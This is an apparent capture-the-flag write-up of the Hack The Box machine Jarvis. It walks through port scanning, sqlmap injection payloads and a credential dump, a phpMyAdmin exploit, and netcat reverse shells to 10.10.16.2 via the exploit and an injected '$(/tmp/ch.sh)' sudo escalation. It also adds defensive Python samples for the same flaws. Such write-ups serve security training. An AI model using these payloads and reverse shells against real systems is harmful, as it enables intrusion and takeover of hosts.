HTB Jarvis
Author: collinhacks (@collinhacks)
Enumeration
nmap: find all ports
nmap -p- -Pn $IP -o full-enumerate.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:16 EDT
Nmap scan report for 10.10.10.143
Host is up (0.031s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
64999/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 9.64 seconds
~/Tools/COLLINHACKS/Lab/nmap-awk.sh full-enumerate.nmap
cat ports.nmap
nmap: check UDP
sudo nmap -sU --top-ports 1000 -v $IP -o udp.nmap
nmap: all identified ports + default scripts & service versions
nmap -p <1,2,3> -A --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
nmap -p 22,80,64999 -A --script http-methods --script http-headers -Pn $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:33 EDT
Nmap scan report for 10.10.10.143
Host is up (0.028s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-headers:
| Date: Tue, 24 Oct 2023 00:33:27 GMT
| Server: Apache/2.4.25 (Debian)
| Set-Cookie: PHPSESSID=v901skl4n4508s6050ln3g4082; path=/
| Expires: Thu, 19 Nov 1981 08:52:00 GMT
| Cache-Control: no-store, no-cache, must-revalidate
| Pragma: no-cache
| IronWAF: 2.0.3
| Connection: close
| Content-Type: text/html; charset=UTF-8
|
|_ (Request type: HEAD)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
64999/tcp open http Apache httpd 2.4.25 ((Debian))
| http-headers:
| Date: Tue, 24 Oct 2023 00:33:27 GMT
| Server: Apache/2.4.25 (Debian)
| Last-Modified: Mon, 04 Mar 2019 02:10:40 GMT
| ETag: "36-5833b43634c39"
| Accept-Ranges: bytes
| Content-Length: 54
| IronWAF: 2.0.3
| Connection: close
| Content-Type: text/html
|
|_ (Request type: HEAD)
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
|_http-server-header: Apache/2.4.25 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.48 seconds
nmap: vuln scan
nmap -p <1,2,3> --script vuln $IP -o vuln.nmap
nmap -p 22,80,64999 --script vuln -Pn $IP -o vuln.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-23 20:36 EDT
Nmap scan report for supersecurehotel.htb (10.10.10.143)
Host is up (0.033s latency).
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-internal-ip-disclosure:
|_ Internal IP Leaked: 127.0.0.1
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-enum:
|_ /phpmyadmin/: phpMyAdmin
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
64999/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 31.42 seconds
Port Enumeration
Port 80
Found on the site: @logger.htb
http://10.10.10.143/phpmyadmin
fuzz dir
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u "http://supersecurehotel.htb/FUZZ" -e .php

       v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://supersecurehotel.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Extensions       : .php
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.php                    [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 34ms]
images                  [Status: 301, Size: 329, Words: 20, Lines: 10, Duration: 42ms]
index.php               [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 65ms]
nav.php                 [Status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 23ms]
footer.php              [Status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 37ms]
css                     [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 18ms]
js                      [Status: 301, Size: 325, Words: 20, Lines: 10, Duration: 24ms]
fonts                   [Status: 301, Size: 328, Words: 20, Lines: 10, Duration: 22ms]
phpmyadmin              [Status: 301, Size: 333, Words: 20, Lines: 10, Duration: 20ms]
connection.php          [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 25ms]
room.php                [Status: 302, Size: 3024, Words: 181, Lines: 102, Duration: 33ms]
sass                    [Status: 301, Size: 327, Words: 20, Lines: 10, Duration: 19ms]
server-status           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 26ms]
[snip: the "# ..." comment lines of the wordlist, with and without .php, and the empty entry all returned the 23628-byte index page with status 200]
:: Progress: [441120/441120] :: Job [1/1] :: 1785 req/sec :: Duration: [0:04:11] :: Errors: 0 ::
fuzz files
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt -u "http://supersecurehotel.htb/FUZZ"

       v2.1.0-dev
________________________________________________
 :: Method           : GET
 :: URL              : http://supersecurehotel.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.php               [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 29ms]
footer.php              [Status: 200, Size: 2237, Words: 101, Lines: 69, Duration: 21ms]
.htaccess               [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 18ms]
.                       [Status: 200, Size: 23628, Words: 3014, Lines: 544, Duration: 25ms]
.html                   [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 30ms]
.php                    [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 29ms]
.htpasswd               [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 18ms]
.htm                    [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 28ms]
.htpasswds              [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 20ms]
nav.php                 [Status: 200, Size: 1333, Words: 76, Lines: 44, Duration: 30ms]
connection.php          [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 30ms]
.htgroup                [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 20ms]
wp-forum.phps           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 21ms]
.htaccess.bak           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 19ms]
.htuser                 [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 28ms]
.htc                    [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 22ms]
.ht                     [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 23ms]
.htaccess.old           [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 23ms]
.htacess                [Status: 403, Size: 285, Words: 20, Lines: 10, Duration: 25ms]
:: Progress: [37050/37050] :: Job [1/1] :: 1680 req/sec :: Duration: [0:00:23] :: Errors: 1 ::
SQLi
http://10.10.10.143/room.php?cod=1
Testing cod=1' (a trailing single quote): SQL injection? Saved the request and put it into sqlmap:
sqlmap -r request --risk 3 --level 3 --tables
sqlmap {1.7.10#stable}  https://sqlmap.org
[*] starting @ 21:57:41 /2023-10-23/
[21:57:41] [INFO] parsing HTTP request from 'request'
[21:57:41] [INFO] resuming back-end DBMS 'mysql'
[21:57:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cod (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cod=1 AND 2494=2494

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cod=1 AND (SELECT 3456 FROM (SELECT(SLEEP(5)))oHpZ)

    Type: UNION query
    Title: Generic UNION query (NULL) - 7 columns
    Payload: cod=-2866 UNION ALL SELECT CONCAT(0x7178706b71,0x456779655073744455536f5365526d565478554e45614e5449427856726f6452656b6d446c766644,0x7170786271),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:57:41] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[21:57:41] [INFO] fetching database names
[21:57:42] [INFO] retrieved: 'hotel'
[21:57:42] [INFO] retrieved: 'information_schema'
[21:57:42] [INFO] retrieved: 'mysql'
[21:57:42] [INFO] retrieved: 'performance_schema'
[21:57:42] [INFO] fetching tables for databases: 'hotel, information_schema, mysql, performance_schema'
[21:57:42] [INFO] retrieved: 'hotel','room'
[21:57:42] [INFO] retrieved: 'information_schema','ALL_PLUGINS'
[snip: one "retrieved: '<db>','<table>'" line per table, 21:57:42 through 21:57:52; the same names appear in the summary below]
Database: hotel
[1 table]
+-------+
| room  |
+-------+

Database: information_schema
[78 tables]
[snip: the standard MariaDB information_schema tables, ALL_PLUGINS through TRIGGERS]

Database: mysql
[30 tables]
+---------------------------+
| event                     |
| host                      |
| plugin                    |
| user                      |
| column_stats              |
| columns_priv              |
| db                        |
| func                      |
| general_log               |
| gtid_slave_pos            |
| help_category             |
| help_keyword              |
| help_relation             |
| help_topic                |
| index_stats               |
| innodb_index_stats        |
| innodb_table_stats        |
| proc                      |
| procs_priv                |
| proxies_priv              |
| roles_mapping             |
| servers                   |
| slow_log                  |
| table_stats               |
| tables_priv               |
| time_zone                 |
| time_zone_leap_second     |
| time_zone_name            |
| time_zone_transition      |
| time_zone_transition_type |
+---------------------------+

Database: performance_schema
[52 tables]
[snip: the standard performance_schema tables, accounts through users]
sqlmap -r request --risk 3 --level 3 -D mysql --dump
Dumping the mysql database gives a credential:
DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
- We need to find an endpoint for this login
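To make the three injection types sqlmap reported concrete, here is an added Python example; it is not code from the writeup or from the Jarvis box (room.php's real source is not on the page). It models the room lookup with an in-memory SQLite table standing in for the MariaDB "hotel" database; the table name comes from the sqlmap output, the column names and rows are assumptions. The concatenating version reproduces the three signals seen above (the cod=1' error, the boolean-based cod=1 AND 2494=2494 probe returning the same row as cod=1, and a UNION that appends attacker-chosen rows), while the parameterized version gives an empty result for all three.

```python
import sqlite3

# Constructed stand-in for the hotel database: an in-memory SQLite table.
# Column names and rows are assumptions; the writeup only shows the cod
# parameter and the table name "room".
SCHEMA = """
CREATE TABLE room (cod INTEGER PRIMARY KEY, name TEXT, price INTEGER);
INSERT INTO room VALUES (1, 'Superior Family Room', 100);
INSERT INTO room VALUES (2, 'Suite', 200);
"""


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, cod):
    """Mirrors a room.php that concatenates ?cod= straight into the query.
    Returns the rows, or None when the database rejected the query."""
    sql = "SELECT cod, name FROM room WHERE cod=" + cod
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        # A syntax error is what the cod=1' probe provokes: the page changes.
        return None


def lookup_safe(conn, cod):
    """Hardened lookup: reject anything that is not an integer, then bind
    the value as a parameter so it can never be parsed as SQL."""
    try:
        value = int(cod)
    except ValueError:
        return []
    return conn.execute("SELECT cod, name FROM room WHERE cod=?", (value,)).fetchall()


def probe(lookup, conn):
    """Run the three sqlmap-style checks and report whether each one leaks."""
    baseline = lookup(conn, "1")
    return {
        # error-based signal: a stray quote breaks the query
        "quote_breaks_query": lookup(conn, "1'") is None,
        # boolean-based blind: a true condition keeps the row, a false one drops it
        "boolean_blind": (lookup(conn, "1 AND 2494=2494") == baseline
                          and lookup(conn, "1 AND 2494=2495") != baseline),
        # UNION-based: attacker-chosen rows come back through the result set
        "union_injection": (lookup(conn, "-2866 UNION ALL SELECT 'injected','row'")
                            == [("injected", "row")]),
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", probe(lookup_vulnerable, db))
    print("safe:      ", probe(lookup_safe, db))
```

The boolean check is the one sqlmap leans on for blind extraction: as long as a true and a false condition produce distinguishable pages, every byte of the database can be pulled out one comparison at a time, which is how the credential dump below was possible without any error message.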
Port 64999
This is possibly our point of entry. The web app didn't have too much going on, and /phpmyadmin gave me this same response, so this endpoint likely has something to do with /phpmyadmin, or vice versa. Also, in our nmap it said it accepts OPTIONS HEAD GET POST.
Seems like I'm not actually banned from this endpoint; it just says that.
Exploitation
Foothold
- We have login credentials found from SQLi which can be used at the login page found at http://10.10.10.143/phpmyadmin/
DBadmin:2D2B7A5E4E637B8FBA1D17F40318F277D29964D0
- The password was a hash; it's imissyou
phpMyAdmin → Shell
- Googled "phpmyadmin 4.8.0 exploit"
python3 exp.py 10.10.10.143 80 /phpmyadmin DBadmin imissyou whoami
python3 exp.py 10.10.10.143 80 /phpmyadmin DBadmin imissyou 'nc -e /bin/bash 10.10.16.2 9001'
Local listener on port 9001
Root
linpeas
Seems like this (simpler.py) is www-data's point of interest.
- Investigating the file, it just pings some host. I can't edit the file, so I have to get it to execute something as sudo, likely a self-created reverse shell, and call it through simpler.py.
sudo file executing a reverse shell
sudo -l
echo -e '#!/bin/bash\n\nnc -e /bin/bash 10.10.16.2 9002' > /tmp/ch.sh
chmod +x /tmp/ch.sh
sudo -u pepper /var/www/Admin-Utilities/simpler.py -p
At the simpler.py prompt, enter:
$(/tmp/ch.sh)
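The escalation above works because the ping helper hands a user-supplied host to a shell, where $(...) is expanded before ping ever runs. The following is an added Python example, not simpler.py's code (its source is not on the page), showing how such a helper should take its argument from a defender's side: parse it as an IP literal and pass it as one argv element with no shell. A hypothetical character denylist is included purely to show why that weaker filter still lets the $(...) input through; it is an assumption, not simpler.py's actual check.

```python
import ipaddress
import subprocess

# Hypothetical denylist of "dangerous" characters, the kind of filter that
# looks safe but is not. An assumption for illustration, not simpler.py's filter.
DENIED = set("&;|`'\"\\")


def denylist_accepts(user_input: str) -> bool:
    """Weak check: only refuses inputs containing a denied character."""
    return not any(ch in DENIED for ch in user_input)


def parse_target(user_input: str) -> str:
    """Strong check: the argument must be a plain IPv4/IPv6 literal.
    ipaddress raises ValueError for anything else, so shell syntax such as
    $(/tmp/ch.sh) or 127.0.0.1; id can never reach a command line."""
    return str(ipaddress.ip_address(user_input.strip()))


def is_acceptable_target(user_input: str) -> bool:
    try:
        parse_target(user_input)
        return True
    except ValueError:
        return False


def build_ping_argv(user_input: str) -> list:
    """Build the command as an argv list; the target is a single argument."""
    return ["ping", "-c", "1", parse_target(user_input)]


def run_ping(user_input: str) -> bool:
    """Run ping without a shell (shell=False is subprocess.run's default),
    so even a metacharacter that slipped past validation would be handed to
    ping literally instead of being expanded."""
    result = subprocess.run(build_ping_argv(user_input), capture_output=True, text=True)
    return result.returncode == 0


if __name__ == "__main__":
    for candidate in ["10.10.10.143", "$(/tmp/ch.sh)", "127.0.0.1; id"]:
        print(f"{candidate!r:20} denylist={denylist_accepts(candidate)!s:5} "
              f"allowlist={is_acceptable_target(candidate)}")
```

Two things have to hold at once for a helper like this to be safe under sudo: the value must be validated against what it is supposed to be (an address), and it must never pass through a shell at all. Either one alone leaves a gap; a denylist never closes it because every character set it omits is a future payload.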
pepper → root
linpeas
systemctl SUID
cd ~
nano root.service
systemctl link root.service
Local: nc -lvnp 9003
systemctl start root
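From the defender's side, a setuid systemctl is exactly the kind of finding a periodic integrity check should catch before anyone links an unprivileged user's unit file with it. Here is an added Python example (not from the writeup) that walks a directory tree, collects regular files with the setuid bit set, and reports any that a known-good baseline does not account for. The baseline paths are assumptions; a real one should be generated from a trusted image of the same distribution.

```python
import os
import shutil
import stat
import tempfile


def find_suid(root: str) -> set:
    """Return the set of regular files under root with the setuid bit set."""
    found = set()
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow symlinks
            except OSError:
                continue                    # vanished or unreadable; skip it
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found


def unexpected_suid(found: set, baseline: set) -> set:
    """Everything setuid that the baseline does not account for."""
    return found - baseline


# Constructed baseline of setuid binaries one would expect on a Debian 9 host.
# An assumption for illustration; build the real list from a known-good image.
BASELINE = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/chsh",
    "/usr/bin/chfn", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/bin/mount",
    "/bin/umount", "/bin/ping",
}


def audit(root: str = "/", baseline: set = BASELINE) -> set:
    return unexpected_suid(find_suid(root), baseline)


def demo_in_tempdir() -> dict:
    """Self-contained demonstration: build a small constructed tree with one
    setuid file and one normal file, then audit it against an empty baseline."""
    root = tempfile.mkdtemp()
    try:
        suid_path = os.path.join(root, "bin", "systemctl")
        plain_path = os.path.join(root, "bin", "ls")
        os.makedirs(os.path.dirname(suid_path))
        for p in (suid_path, plain_path):
            with open(p, "w") as f:
                f.write("#!/bin/sh\n")
        os.chmod(plain_path, 0o755)
        os.chmod(suid_path, 0o4755)          # the bit the audit is looking for
        found = find_suid(root)
        return {
            "suid_flagged": suid_path in found,
            "plain_ignored": plain_path not in found,
            "unexpected": unexpected_suid(found, set()) == {suid_path},
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print("demo:", demo_in_tempdir())
    for path in sorted(audit()):
        print("unexpected setuid binary:", path)
```

Running audit() over the whole filesystem is slow; in practice you would scan the usual binary directories and compare against a signed baseline, and alert on any new entry rather than on the full list.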
Lessons Learned
- Practiced SQLi and RCE
- Exploited a different form of sudo -l finding, where I made a bash file executable and then called that file from within the simpler.py script that was being run as sudo
- Learned about SUID systemctl